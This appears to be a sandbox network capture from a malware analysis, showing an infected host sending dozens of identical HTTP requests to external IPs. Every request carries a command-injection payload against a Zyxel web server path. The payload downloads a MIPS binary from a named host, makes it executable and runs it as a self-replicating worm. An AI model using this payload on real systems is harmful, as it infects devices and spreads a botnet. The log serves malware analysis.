                                      Jan 19, 2024 17:29:45.029469013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7530192.168.2.1440082188.178.236.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029529095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7531192.168.2.145172614.23.240.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029557943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7532192.168.2.1444956185.169.103.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029613972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7533192.168.2.144548696.154.52.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029659033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7534192.168.2.1445574185.156.197.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029689074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7535192.168.2.1433726161.149.24.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029736042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7536192.168.2.1442464178.74.237.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029737949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7537192.168.2.145426487.221.57.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029771090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7538192.168.2.1441320102.38.134.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029839993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7539192.168.2.1443912101.225.86.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029845953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7540192.168.2.1444024171.119.199.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029911995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7541192.168.2.1445442118.100.209.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029937983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7542192.168.2.14423982.153.174.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029968023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7543192.168.2.1452194206.39.217.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030023098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7544192.168.2.145616861.118.1.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030066013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7545192.168.2.1441294172.169.138.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030112028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7546192.168.2.1460036217.116.217.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030142069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7547192.168.2.144740238.35.230.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030190945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7548192.168.2.1456030173.111.151.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030211926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7549192.168.2.1459870104.223.177.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030266047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7550192.168.2.144439242.154.139.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030302048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7551192.168.2.144138641.125.157.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030328035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7552192.168.2.1436814167.240.188.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030356884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7553192.168.2.144455636.248.35.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030405045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7554192.168.2.1452410179.217.125.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030421972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7555192.168.2.144727688.13.5.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030476093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7556192.168.2.14570181.147.145.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030523062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7557192.168.2.1439696178.5.63.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030580997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7558192.168.2.145920651.85.69.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030625105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7559192.168.2.1436058122.135.135.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030657053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7560192.168.2.144898082.235.163.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030725002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7561192.168.2.1450390111.212.82.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030750990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7562192.168.2.1447086222.1.191.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030786037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7563192.168.2.1460936103.34.41.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030836105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7564192.168.2.1437696207.85.71.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030857086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7565192.168.2.1442718181.175.206.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030883074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7566192.168.2.1454448203.2.86.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030931950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7567192.168.2.144169858.103.233.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.030982971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7568192.168.2.145890636.29.235.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031016111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7569192.168.2.144038447.246.196.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031045914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7570192.168.2.143601899.20.161.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031081915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7571192.168.2.144961671.9.215.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031137943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7572192.168.2.1449746209.100.65.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031176090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7573192.168.2.1442794147.40.194.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031213045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7574192.168.2.144182836.232.77.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031240940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7575192.168.2.146075623.206.188.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031269073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7576192.168.2.144399899.135.209.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031330109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7577192.168.2.1458894209.219.47.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031364918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7578192.168.2.143427859.233.104.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031397104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7579192.168.2.145178066.150.8.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031420946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7580192.168.2.1435402176.122.68.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031470060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7581192.168.2.144326094.129.141.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031526089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7582192.168.2.1432880166.90.141.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031549931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7583192.168.2.1450488105.153.68.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031618118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7584192.168.2.144154627.204.76.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031680107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7585192.168.2.1440772104.171.178.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031718969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7586192.168.2.1456510130.202.231.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031744957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7587192.168.2.1444492185.120.30.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031807899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7588192.168.2.146097677.79.182.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031847954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7589192.168.2.146066041.176.40.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031872988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7590192.168.2.143305634.155.70.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031907082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7591192.168.2.143529641.108.155.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031950951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7592192.168.2.1442786196.152.220.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.031992912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7593192.168.2.1446246160.24.72.174443
                                      TimestampBytes transferredDirectionData
